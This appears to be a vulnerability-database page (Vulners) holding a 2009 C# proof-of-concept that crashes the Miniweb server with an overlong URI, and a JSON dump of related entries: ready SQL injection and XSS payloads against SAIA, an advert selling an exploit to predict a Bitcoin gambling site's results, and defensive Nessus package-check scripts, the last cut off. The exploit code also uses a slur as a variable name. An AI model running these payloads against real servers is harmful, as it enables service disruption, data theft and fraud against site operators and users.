Search...

Miniweb Buffer Overflow

2009-04-16T00:00:00

ID SECURITYVULNS:DOC:21671
Type securityvulns
Reporter Securityvulns
Modified 2009-04-16T00:00:00

Description

############# Miniweb Remote Buffer Overflow

##By: e.wiZz!

##Site: www.balcansecurity.com

## Found with ServMeNot (world's sexiest fuzzer :P )

In the wild...

/ BoF when requesting URI longer than 120~ /

using System; using System.IO; using System.Net; using System.Text;

namespace idiot { class pf { static void Main(string[] args) { Console.Write("Enter host:\n"); string site = Console.ReadLine(); string uri = null; try { for (int i = 0; i < 144; i++) { uri += "/"; } HttpWebRequest request = (HttpWebRequest) HttpWebRequest.Create(site + uri); HttpWebResponse response = (HttpWebResponse)

                request.GetResponse&#40;&#41;;

            //any response we get means that exploit failed
            if &#40;response.GetResponseHeader&#40;&quot;Content-Lenght&quot;&#41; != &quot;a&quot;&#41;
            {
                Console.WriteLine&#40;&quot;Exploit failed&quot;&#41;;
            }

        }
        catch &#40;Exception gayexception&#41;
        {
            Console.WriteLine&#40;&quot;Cannot connect&quot;&#41;;
            Console.WriteLine&#40;&quot;{0}&quot;, gayexception.Message&#41;;
        }
    }
}

}

JSON Vulners Source

Initial Source

{"id": "SECURITYVULNS:DOC:21671", "bulletinFamily": "software", "title": "Miniweb Buffer Overflow", "description": "################### Miniweb Remote Buffer Overflow ############################\r\n\r\n########By: e.wiZz!\r\n\r\n########Site: www.balcansecurity.com\r\n\r\n######## Found with ServMeNot (world's sexiest fuzzer :P )\r\n\r\n\r\n\r\nIn the wild...\r\n#################################################################\r\n\r\n/* BoF when requesting URI longer than 120~ */\r\n\r\nusing System;\r\nusing System.IO;\r\nusing System.Net;\r\nusing System.Text;\r\n\r\nnamespace idiot\r\n{\r\n class pf\r\n {\r\n static void Main(string[] args)\r\n {\r\n Console.Write("Enter host:\n");\r\n string site = Console.ReadLine();\r\n string uri = null;\r\n try\r\n {\r\n for (int i = 0; i < 144; i++) { uri += "/"; }\r\n HttpWebRequest request = (HttpWebRequest)\r\n HttpWebRequest.Create(site + uri);\r\n HttpWebResponse response = (HttpWebResponse)\r\n\r\n request.GetResponse();\r\n\r\n //any response we get means that exploit failed\r\n if (response.GetResponseHeader("Content-Lenght") != "a")\r\n {\r\n Console.WriteLine("Exploit failed");\r\n }\r\n\r\n }\r\n catch (Exception gayexception)\r\n {\r\n Console.WriteLine("Cannot connect");\r\n Console.WriteLine("{0}", gayexception.Message);\r\n }\r\n }\r\n }\r\n}", "published": "2009-04-16T00:00:00", "modified": "2009-04-16T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:21671", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:30", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "ef11eb5fa42ff18870d8a68b495f2d6c"}, {"key": "href", "hash": "f68a7aa6223d09a52080a899d0b33c50"}, {"key": "modified", "hash": "d73da2fab595cc95d23fce85840a4051"}, {"key": "published", "hash": "d73da2fab595cc95d23fce85840a4051"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "a49ebb2e1a771348dfa0039e0d589df6"}, {"key": "title", "hash": "55617e9ad460b9d57a23bf8fd7fd791d"}, {"key": "type", "hash": "d54751dd75af2ea0147b462b3e001cd0"}], "hash": "a1b18fa124bf84698ff7af6877b92d81439477463b59c9feebf54921bb4becfe", "viewCount": 1, "enchantments": {"score": {"value": 2.7, "vector": "NONE", "modified": "2018-08-31T11:10:30"}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310852529", "OPENVAS:1361412562310852527"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1485-1", "OPENSUSE-SU-2019:1481-1", "OPENSUSE-SU-2019:1479-1"]}, {"type": "ubuntu", "idList": ["USN-3996-1"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994293"]}, {"type": "zdt", "idList": ["1337DAY-ID-32799", "1337DAY-ID-32775", "1337DAY-ID-32772", "1337DAY-ID-32771", "1337DAY-ID-32767", "1337DAY-ID-32754", "1337DAY-ID-32753", "1337DAY-ID-32757", "1337DAY-ID-32725", "1337DAY-ID-32724"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:152997"]}, {"type": "kitploit", "idList": ["KITPLOIT:3928947731225997712"]}], "modified": "2018-08-31T11:10:30"}, "vulnersScore": 2.7}, "objectVersion": "1.3", "affectedSoftware": []}

{"zdt": [{"lastseen": "2020-03-30T16:00:57", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2020-03-28T00:00:00", "published": "2020-03-28T00:00:00", "id": "1337DAY-ID-34153", "href": "https://0day.today/exploit/description/34153", "title": "SAIA (Software Gestion Documental) SQL Injection & XSS Vulnerabilities", "type": "zdt", "sourceData": "################################\r\n# Exploit Title: SAIA (Software Gestion Documental) SQL Injection & XSS Vulnerability\r\n# D0rk: intext:\"Todos los derechos reservados CERO K\"\r\n# Exploit Author: n4pst3r\r\n# Vendor Homepage: https://www.cerok.co/\r\n# Tested on: Windows 10, Debian 9\r\n################################\u00a0\r\n---------------------------------------------------------\r\n\u00a0\u00a0\r\nSQLi:\r\n\u00a0\r\nhttp://localhost/path/saia/pantallas/buscador_principal.php?idbusqueda=[SQLi]&cmd=resetall\r\nhttp://localhost/path/saia/noticia_index/mostrar_noticia.php?idnoticia_index=[SQLi]\r\n\u00a0\r\nResponse:\r\n\u00a0\r\nParameter: idbusqueda (GET)\r\n Type: boolean-based blind\r\n Title: AND boolean-based blind - WHERE or HAVING clause\r\n Payload: idbusqueda=24 AND 7287=7287&cmd=resetall\r\n\r\n Type: time-based blind\r\n Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)\r\n Payload: idbusqueda=24 AND (SELECT 7591 FROM (SELECT(SLEEP(5)))Dnrp)&cmd=resetall\r\n\r\n Type: UNION query\r\n Title: Generic UNION query (NULL) - 15 columns\r\n Payload: idbusqueda=-3640 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a716a71,0x4c76476b62684f4147666\r\n84c426c745774496d596c65494b486371636149787269794354564b6551,0x716a767171),NULL,NULL-- treG&cmd=resetall\r\n\u00a0\r\nXSS:\r\n\u00a0\r\nhttps://localhost/path/saia/index.php?texto_salir=[XSS]\r\n\r\nPayload: <img src=xss onerror=alert(\"XSS\")>\r\n\n\n# 0day.today [2020-03-30] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/34153"}, {"lastseen": "2020-03-24T01:09:11", "bulletinFamily": "exploit", "description": "BustaBit used a root server seed to generate its current hash chain.\r PLAY: https://www.bustabit.com/play\r FAQ: https://www.bustabit.com/faq\r Each item in the hashchain represents a result in the game.\rMy exploit provides you with the root server seed and a javascript file which you can start via:\rnode bustabit-v2.js <gameNumber>\rIt will generate the next 10 game results starting from the <gameNumber>\r bustabit is a thrilling social bitcoin gambling game. It's a real time, simple, and exciting game where you can securely play for fun or to win money.\r Each round of the game, you have the opportunity to place a bet before the round starts. Once the round begins, a lucky multiplier starts at 1x and begins climbing higher and higher.\r At any moment, you can click \"Cashout\" to lock in the current multiplier which awards you with your multiplied bet.\r The longer you stay in the game before cashing out, the higher the multiplier gets. But beware! Every tick of the game has a chance of busting. If you do not cash out before the bust, you lose your bet.\r#### Usage Info\nDo not use it to obvious as it could raise suspicion.\r You can run my javascript file from any operating system having node installed or simply create your own bot using the server root seed.\n\nThis is private exploit. You can buy it at https://0day.today", "modified": "2020-03-24T00:00:00", "published": "2020-03-24T00:00:00", "id": "1337DAY-ID-34134", "href": "https://0day.today/exploit/description/34134", "title": "Bustabit Bitcoin Server Seed way of earning Exploit", "type": "zdt", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": ""}], "nessus": [{"lastseen": "2020-03-27T00:07:25", "bulletinFamily": "scanner", "description": "When parsing certain JSON documents, the json gem (including the one\nbundled with Ruby) can be coerced into creating arbitrary objects in\nthe target system.\n\nThis is the same issue as CVE-2013-0269. The previous fix was\nincomplete, which addressed JSON.parse(user_input), but didn", "modified": "2020-03-26T00:00:00", "id": "FREEBSD_PKG_40194E1C6D8911EA808280EE73419AF3.NASL", "href": "https://www.tenable.com/plugins/nessus/134921", "published": "2020-03-26T00:00:00", "title": "FreeBSD : rubygem-json -- Unsafe Objection Creation Vulnerability in JSON (Additional fix) (40194e1c-6d89-11ea-8082-80ee73419af3)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2020 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(134921);\n script_version(\"1.1\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/26\");\n\n script_cve_id(\"CVE-2020-10663\");\n\n script_name(english:\"FreeBSD : rubygem-json -- Unsafe Objection Creation Vulnerability in JSON (Additional fix) (40194e1c-6d89-11ea-8082-80ee73419af3)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"When parsing certain JSON documents, the json gem (including the one\nbundled with Ruby) can be coerced into creating arbitrary objects in\nthe target system.\n\nThis is the same issue as CVE-2013-0269. The previous fix was\nincomplete, which addressed JSON.parse(user_input), but didn't\naddress some other styles of JSON parsing including JSON(user_input)\nand JSON.parse(user_input, nil).\n\nSee CVE-2013-0269 in detail. Note that the issue was exploitable to\ncause a Denial of Service by creating many garbage-uncollectable\nSymbol objects, but this kind of attack is no longer valid because\nSymbol objects are now garbage-collectable. However, creating\narbitrary bjects may cause severe security consequences depending upon\nthe application code.\n\nPlease update the json gem to version 2.3.0 or later. You can use gem\nupdate json to update it. If you are using bundler, please add gem\n'json', '>= 2.3.0' to your Gemfile.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.ruby-lang.org/en/news/2020/03/19/json-dos-cve-2020-10663/\"\n );\n # https://vuxml.freebsd.org/freebsd/40194e1c-6d89-11ea-8082-80ee73419af3.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5e54143b\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:rubygem-json\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/03/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/03/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/03/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"rubygem-json<=2.3.0\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-26T06:41:11", "bulletinFamily": "scanner", "description": "According to the version of the ntp packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerability :\n\n - The monlist feature in ntp_request.c in ntpd in NTP\n before 4.2.7p26 allows remote attackers to cause a\n denial of service (traffic amplification) via forged\n (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests,\n as exploited in the wild in December\n 2013.(CVE-2013-5211)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2020-03-23T00:00:00", "id": "EULEROS_SA-2020-1314.NASL", "href": "https://www.tenable.com/plugins/nessus/134805", "published": "2020-03-23T00:00:00", "title": "EulerOS 2.0 SP5 : ntp (EulerOS-SA-2020-1314)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(134805);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/25\");\n\n script_cve_id(\n \"CVE-2013-5211\"\n );\n script_bugtraq_id(\n 64692\n );\n\n script_name(english:\"EulerOS 2.0 SP5 : ntp (EulerOS-SA-2020-1314)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the ntp packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerability :\n\n - The monlist feature in ntp_request.c in ntpd in NTP\n before 4.2.7p26 allows remote attackers to cause a\n denial of service (traffic amplification) via forged\n (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests,\n as exploited in the wild in December\n 2013.(CVE-2013-5211)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1314\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3885e27d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected ntp package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/03/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/03/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ntpdate\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:sntp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(5)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP5\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP5\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\n\nflag = 0;\n\npkgs = [\"ntp-4.2.6p5-28.h13.eulerosv2r7\",\n \"ntpdate-4.2.6p5-28.h13.eulerosv2r7\",\n \"sntp-4.2.6p5-28.h13.eulerosv2r7\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"5\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ntp\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-03-26T06:41:12", "bulletinFamily": "scanner", "description": "According to the version of the qt packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerability :\n\n - Qt through 5.14 allows an exponential XML entity\n expansion attack via a crafted SVG document that is\n mishandled in QXmlStreamReader, a related issue to\n CVE-2003-1564.(CVE-2015-9541)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2020-03-23T00:00:00", "id": "EULEROS_SA-2020-1323.NASL", "href": "https://www.tenable.com/plugins/nessus/134814", "published": "2020-03-23T00:00:00", "title": "EulerOS 2.0 SP5 : qt (EulerOS-SA-2020-1323)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(134814);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/25\");\n\n script_cve_id(\n \"CVE-2015-9541\"\n );\n\n script_name(english:\"EulerOS 2.0 SP5 : qt (EulerOS-SA-2020-1323)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the qt packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerability :\n\n - Qt through 5.14 allows an exponential XML entity\n expansion attack via a crafted SVG document that is\n mishandled in QXmlStreamReader, a related issue to\n CVE-2003-1564.(CVE-2015-9541)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1323\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0e13b357\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected qt package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/03/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/03/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:qt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:qt-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:qt-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:qt-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:qt-postgresql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:qt-x11\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(5)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP5\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP5\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\n\nflag = 0;\n\npkgs = [\"qt-4.8.7-2.h6.eulerosv2r7\",\n \"qt-devel-4.8.7-2.h6.eulerosv2r7\",\n \"qt-mysql-4.8.7-2.h6.eulerosv2r7\",\n \"qt-odbc-4.8.7-2.h6.eulerosv2r7\",\n \"qt-postgresql-4.8.7-2.h6.eulerosv2r7\",\n \"qt-x11-4.8.7-2.h6.eulerosv2r7\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"5\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"qt\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-03-26T06:41:07", "bulletinFamily": "scanner", "description": "According to the version of the qt packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerability :\n\n - Qt through 5.14 allows an exponential XML entity\n expansion attack via a crafted SVG document that is\n mishandled in QXmlStreamReader, a related issue to\n CVE-2003-1564.(CVE-2015-9541)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2020-03-23T00:00:00", "id": "EULEROS_SA-2020-1299.NASL", "href": "https://www.tenable.com/plugins/nessus/134791", "published": "2020-03-23T00:00:00", "title": "EulerOS 2.0 SP8 : qt (EulerOS-SA-2020-1299)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(134791);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/25\");\n\n script_cve_id(\n \"CVE-2015-9541\"\n );\n\n script_name(english:\"EulerOS 2.0 SP8 : qt (EulerOS-SA-2020-1299)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the qt packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerability :\n\n - Qt through 5.14 allows an exponential XML entity\n expansion attack via a crafted SVG document that is\n mishandled in QXmlStreamReader, a related issue to\n CVE-2003-1564.(CVE-2015-9541)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1299\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?802fe796\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected qt package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/03/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/03/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:qt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:qt-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:qt-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:qt-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:qt-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:qt-x11\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 